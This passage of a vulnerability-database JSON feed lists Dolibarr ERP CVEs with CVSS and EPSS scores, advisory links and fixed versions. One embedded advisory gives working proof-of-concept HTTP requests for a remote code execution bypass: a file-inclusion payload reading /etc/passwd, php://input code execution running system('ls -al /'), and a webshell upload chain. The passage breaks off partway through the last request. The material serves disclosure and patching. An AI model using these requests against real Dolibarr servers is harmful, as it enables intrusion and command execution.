l":"pkg:composer/dolibarr/dolibarr@18.0.2","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@18.0.2"}],"aliases":["CVE-2023-4197","GHSA-r9cm-pw9j-3fpx"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-pn1n-de3e-uufv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/140209?format=json","vulnerability_id":"VCID-qrcn-mrfx-xyb2","summary":"Improper Access Control in Dolibarr ERP CRM <= v17.0.3 allows an unauthorized authenticated user to read a database table containing customer data","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4198","reference_id":"","reference_type":"","scores":[{"value":"0.00079","scoring_system":"epss","scoring_elements":"0.23549","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-4198"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/3065b9ca6ade988e8d7a8a8550415c0abb56b9cb","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/3065b9ca6ade988e8d7a8a8550415c0abb56b9cb"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4198","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-4198"},{"reference_url":"https://starlabs.sg/advisories/23/23-4198","reference_id":"23-4198","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T19:56:24Z/"}],"url":"https://starlabs.sg/advisories/23/23-4198"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/3065b9ca6ade988e8d7a8a8550415c0abb56b9cb#diff-7d68365a708c954051853ade884c7e97c6ff13150ee92657d6ffc8603e0f947b","reference_id":"3065b9ca6ade988e8d7a8a8550415c0abb56b9cb#diff-7d68365a708c954051853ade884c7e97c6ff13150ee92657d6ffc8603e0f947b","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-05T19:56:24Z/"}],"url":"https://github.com/Dolibarr/dolibarr/commit/3065b9ca6ade988e8d7a8a8550415c0abb56b9cb#diff-7d68365a708c954051853ade884c7e97c6ff13150ee92657d6ffc8603e0f947b"},{"reference_url":"https://github.com/advisories/GHSA-48v2-596x-4jr9","reference_id":"GHSA-48v2-596x-4jr9","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-48v2-596x-4jr9"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/379242?format=json","purl":"pkg:composer/dolibarr/dolibarr@18.0.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@18.0.0"}],"aliases":["CVE-2023-4198","GHSA-48v2-596x-4jr9"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qrcn-mrfx-xyb2"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/298324?format=json","vulnerability_id":"VCID-qumf-2xyz-tqe5","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-10094","reference_id":"","reference_type":"","scores":[{"value":"0.73712","scoring_system":"epss","scoring_elements":"0.98835","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-10094"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/7ade4e37f24d6859987bb9f6232f604325633fdd","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/7ade4e37f24d6859987bb9f6232f604325633fdd"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-10094","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-10094"},{"reference_url":"https://sysdream.com/news/lab/2018-05-21-cve-2018-10094-dolibarr-sql-injection-vulnerability","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://sysdream.com/news/lab/2018-05-21-cve-2018-10094-dolibarr-sql-injection-vulnerability"},{"reference_url":"https://www.exploit-db.com/exploits/44805","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.exploit-db.com/exploits/44805"},{"reference_url":"https://www.exploit-db.com/exploits/44805/","reference_id":"","reference_type":"","scores":[],"url":"https://www.exploit-db.com/exploits/44805/"},{"reference_url":"http://www.openwall.com/lists/oss-security/2018/05/21/1","reference_id":"","reference_type":"","scores":[{"value":"9.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://www.openwall.com/lists/oss-security/2018/05/21/1"},{"reference_url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/44805.txt","reference_id":"CVE-2018-10094","reference_type":"exploit","scores":[],"url":"https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/php/webapps/44805.txt"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/21306?format=json","purl":"pkg:composer/dolibarr/dolibarr@7.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-2p7p-cynw-77ej"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-3ust-28tv-mkd5"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-73pa-djjd-4ufu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-et1a-rh8j-17ad"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kk1j-umud-wkdn"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-nn71-z52s-u7g9"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-tghv-9zk4-6fde"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.2"}],"aliases":["CVE-2018-10094","GHSA-57wj-22w9-wm9r"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qumf-2xyz-tqe5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/297452?format=json","vulnerability_id":"VCID-qyxz-nb5d-3qa8","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2017-9839","reference_id":"","reference_type":"","scores":[{"value":"0.00218","scoring_system":"epss","scoring_elements":"0.4454","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2017-9839"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2017-9839","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2017-9839"},{"reference_url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2017-010","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.wizlynxgroup.com/security-research-advisories/vuln/WLX-2017-010"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/384678?format=json","purl":"pkg:composer/dolibarr/dolibarr@5.0.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1nww-vebc-rfe7"},{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-2p7p-cynw-77ej"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-3ust-28tv-mkd5"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-53d8-7k7n-vud1"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-73pa-djjd-4ufu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-884a-z62x-dyhq"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-dzuu-tkyp-8udb"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-et1a-rh8j-17ad"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-jmau-m9qu-s3h6"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kk1j-umud-wkdn"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-nn71-z52s-u7g9"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-qumf-2xyz-tqe5"},{"vulnerability":"VCID-qzu2-uf2r-yydt"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-w6uz-k9fr-jkdr"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@5.0.4"}],"aliases":["CVE-2017-9839","GHSA-84gh-4m36-cgqx"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qyxz-nb5d-3qa8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/298325?format=json","vulnerability_id":"VCID-qzu2-uf2r-yydt","summary":"","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2018-10095","reference_id":"","reference_type":"","scores":[{"value":"0.475","scoring_system":"epss","scoring_elements":"0.9777","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2018-10095"},{"reference_url":"https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog"},{"reference_url":"https://github.com/Dolibarr/dolibarr/commit/1dc466e1fb687cfe647de4af891720419823ed56","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/Dolibarr/dolibarr/commit/1dc466e1fb687cfe647de4af891720419823ed56"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2018-10095","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2018-10095"},{"reference_url":"https://sysdream.com/news/lab/2018-05-21-cve-2018-10095-dolibarr-xss-injection-vulnerability","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://sysdream.com/news/lab/2018-05-21-cve-2018-10095-dolibarr-xss-injection-vulnerability"},{"reference_url":"http://www.openwall.com/lists/oss-security/2018/05/21/3","reference_id":"","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"http://www.openwall.com/lists/oss-security/2018/05/21/3"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/21306?format=json","purl":"pkg:composer/dolibarr/dolibarr@7.0.2","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1qr4-xs72-e3a2"},{"vulnerability":"VCID-2fj8-fn7c-3ka1"},{"vulnerability":"VCID-2fk1-fu91-kfh1"},{"vulnerability":"VCID-2p7p-cynw-77ej"},{"vulnerability":"VCID-3ny3-rj44-ffgf"},{"vulnerability":"VCID-3ust-28tv-mkd5"},{"vulnerability":"VCID-44tq-zhx1-8beb"},{"vulnerability":"VCID-4cfp-8g13-k7bd"},{"vulnerability":"VCID-54b5-vj66-ayeu"},{"vulnerability":"VCID-5ykc-55w1-3ka4"},{"vulnerability":"VCID-5ynu-3t27-kuhq"},{"vulnerability":"VCID-6mqr-g619-dqbu"},{"vulnerability":"VCID-73pa-djjd-4ufu"},{"vulnerability":"VCID-76rs-x78m-1fg6"},{"vulnerability":"VCID-79w7-szqt-wfeq"},{"vulnerability":"VCID-7g1w-ar9a-r7fb"},{"vulnerability":"VCID-83c2-jnk3-mbau"},{"vulnerability":"VCID-9f3a-9c5y-juf1"},{"vulnerability":"VCID-aeaq-1k3n-y7h1"},{"vulnerability":"VCID-az9a-3z2g-9kht"},{"vulnerability":"VCID-azy5-es2r-yyex"},{"vulnerability":"VCID-bthp-4km9-ekhz"},{"vulnerability":"VCID-cjmf-3m54-x3af"},{"vulnerability":"VCID-en1t-b8gx-6bgt"},{"vulnerability":"VCID-et1a-rh8j-17ad"},{"vulnerability":"VCID-f3k5-kjua-mqes"},{"vulnerability":"VCID-f96a-99zf-kfcf"},{"vulnerability":"VCID-fyuf-7bvy-b3am"},{"vulnerability":"VCID-gk4m-a13r-ekd6"},{"vulnerability":"VCID-h4pr-kj49-xfhb"},{"vulnerability":"VCID-k1fz-zvje-17ga"},{"vulnerability":"VCID-kk1j-umud-wkdn"},{"vulnerability":"VCID-kxze-6h5v-mqg4"},{"vulnerability":"VCID-mn75-tppb-dfd6"},{"vulnerability":"VCID-n6mk-74qs-6bfw"},{"vulnerability":"VCID-nn71-z52s-u7g9"},{"vulnerability":"VCID-p7h1-ceff-pfhu"},{"vulnerability":"VCID-pn1n-de3e-uufv"},{"vulnerability":"VCID-qrcn-mrfx-xyb2"},{"vulnerability":"VCID-rjd3-a1ds-skdp"},{"vulnerability":"VCID-rtec-tutp-m3ep"},{"vulnerability":"VCID-snwr-xzcb-rfdr"},{"vulnerability":"VCID-spzz-de9a-g3gw"},{"vulnerability":"VCID-szp5-96ea-jua5"},{"vulnerability":"VCID-t393-s4zx-uyhs"},{"vulnerability":"VCID-tfxu-34ku-6uce"},{"vulnerability":"VCID-tghv-9zk4-6fde"},{"vulnerability":"VCID-vxpt-gdg8-r7dc"},{"vulnerability":"VCID-wtcs-fcvg-dkgm"},{"vulnerability":"VCID-ww61-hqb4-m3db"},{"vulnerability":"VCID-x7qz-jffh-9ydk"},{"vulnerability":"VCID-y2yy-zrhp-rba3"},{"vulnerability":"VCID-zwts-bt1w-p7a4"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/dolibarr/dolibarr@7.0.2"}],"aliases":["CVE-2018-10095","GHSA-p2fm-8rhj-58fr"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-qzu2-uf2r-yydt"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360765?format=json","vulnerability_id":"VCID-rjd3-a1ds-skdp","summary":"Dolibarr has Remote Code Execution Vulnerability (Bypass)\n# Summary\n\nThe Dolibarr backend provides the function of adding Menu, and supports setting permissions for the added Menu:\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228164114688.png)\n\nThis is the trigger point of the vulnerability. The submitted permission can be php code, and it will be executed when viewing the created Menu:\n\n- htdocs/admin/menus/edit.php\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228164445656.png)\n\nAs you can see, in edit.php, if the created menu is set to `$menu->perms`, the `dol_eval()` method will be called. Following the `dol_eval()` method, we can see that it will filter the dangerous php functions in `$menu->perms` through the blacklist set in `$forbiddenphpfunctions`:\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228164725548.png)\n\nHowever, the blacklist here is not comprehensive. For example, the `include_once` and `require_once` functions can easily pass the blacklist check, which will cause file inclusion vulnerabilities. Moreover, if the `allow_url_include` option is enabled in php.ini, arbitrary code execution will occur. **The most serious thing is that we can cooperate with the file upload at `/htdocs/user/document.php?id=1&uploadform=1` to achieve more general arbitrary code execution.**\n\n# Proof of Concept\n\n## Local File Inclusion\n\n(1) First, create a Menu and set \"Permissions\" to `include_once('/etc/passwd')` (note that `''` must be used here because `\"` will be detected):\n\n```http\nPOST /htdocs/admin/menus/edit.php?action=add&token=fae63868ce9c2a7eece04a49ffdbe23f&menuId=0 HTTP/1.1\nHost: 192.168.31.31\nContent-Length: 210\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://192.168.31.31\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: http://192.168.31.31/htdocs/admin/menus/edit.php?menuId=0&action=create&menu_handler=all&backtopage=%2Fhtdocs%2Fadmin%2Fmenus%2Findex.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,ru;q=0.7,ja;q=0.6\nCookie: DOLSESSID_cc5001a0224d79c07308a0908c6213b79e5d7d10=82ef3f1d798bf58a0e11c0cbacc390dd\nConnection: close\n\ntoken=fae63868ce9c2a7eece04a49ffdbe23f&menu_handler=all&user=2&type=top&propertymainmenu=test1test&titre=test1test&url=test1test&langs=&position=100&target=&enabled=1&perms=include_once('/etc/passwd')&save=Save\n```\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228165411557.png)\n\n(2) Then we look at the Menu we just created, and we can see that the contents of `/etc/passwd` have been successfully read out:\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228165517668.png)\n\n## Remote Code Execution - 1\n\n(1) We first ensure that the `allow_url_include` option of php.ini on the server is `On`:\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228160154464.png)\n\nAt this point, we can use remote file inclusion and cooperate with `php://input` to achieve arbitrary code execution.\n\n(2) Create a Menu and set \"Permissions\" to `include_once('php://input')` (note that `''` must be used here because `\"` will be detected):\n\n```http\nPOST /htdocs/admin/menus/edit.php?action=add&token=fae63868ce9c2a7eece04a49ffdbe23f&menuId=0 HTTP/1.1\nHost: 192.168.31.31\nContent-Length: 210\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://192.168.31.31\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: http://192.168.31.31/htdocs/admin/menus/edit.php?menuId=0&action=create&menu_handler=all&backtopage=%2Fhtdocs%2Fadmin%2Fmenus%2Findex.php\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,ru;q=0.7,ja;q=0.6\nCookie: DOLSESSID_cc5001a0224d79c07308a0908c6213b79e5d7d10=82ef3f1d798bf58a0e11c0cbacc390dd\nConnection: close\n\ntoken=fae63868ce9c2a7eece04a49ffdbe23f&menu_handler=all&user=2&type=top&propertymainmenu=test1test&titre=test1test&url=test1test&langs=&position=100&target=&enabled=1&perms=include_once('php://input')&save=Save\n```\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228165822802.png)\n\n(3) Finally, the system command is successfully executed through the POST request:\n\n```http\nPOST http://192.168.31.31/htdocs/admin/menus/edit.php?menu_handler=all&action=edit&token=fae63868ce9c2a7eece04a49ffdbe23f&menuId=24 HTTP/1.1\nHost: 192.168.31.31\nContent-Length: 27\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://192.168.31.31\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: http://192.168.31.31/index.php?url=/etc/passwd\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,ru;q=0.7,ja;q=0.6\nCookie: DOLSESSID_cc5001a0224d79c07308a0908c6213b79e5d7d10=82ef3f1d798bf58a0e11c0cbacc390dd\nConnection: close\n\n<?php system('ls -al /');?>\n```\n\n![](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228165923443.png)\n\n## Remote Code Execution - 2 (File Inclusion with file upload)\n\nAt this point, we are absolutely sure that a file inclusion vulnerability can be achieved by setting \"Permissions\", and arbitrary code execution can be achieved with `allow_url_include = On`. However, the setting `allow_url_include = On` does not exist on every server. Therefore, to achieve the purpose of universal arbitrary code execution, we need to cooperate with the file upload (without suffix) function.\n\n(1) We can upload a file containing php webshell code through the \"Attach a new file/document\" function in `/htdocs/user/document.php?id=1&uploadform=1`. The file name is \"shell\" (this file There must be no suffix, otherwise the detection of `.` by `dol_eval()` cannot be bypassed when setting \"Permissions\" later. Among all file upload points, only \"Attach a new file/document\" can be Upload files without suffix):\n\n![image-20240228232622397](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228232622397.png)\n\n(2) upload the \"shell\":\n\n![image-20240228231150328](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228231150328.png)\n\nImages uploaded from here will eventually be saved on the server in the \"/var/www/html/documents/users/1/\" directory:\n\n![image-20240228230738376](https://raw.githubusercontent.com/wh0amitx/Misc/main/images/image-20240228230738376.png)\n\n（3）create a Menu and set \"Permissions\" to `include_once('/var/www/html/documents/users/1/shell')` (note that `''` must be used here because `\"` will be detected).\n\n```http\nPOST /htdocs/admin/menus/edit.php?action=add&token=fae63868ce9c2a7eece04a49ffdbe23f&menuId=0 HTTP/1.1\nHost: 192.168.31.31\nContent-Length: 210\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nOrigin: http://192.168.31.31\nContent-Type: application/x-www-form-urlencoded\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7\nReferer: 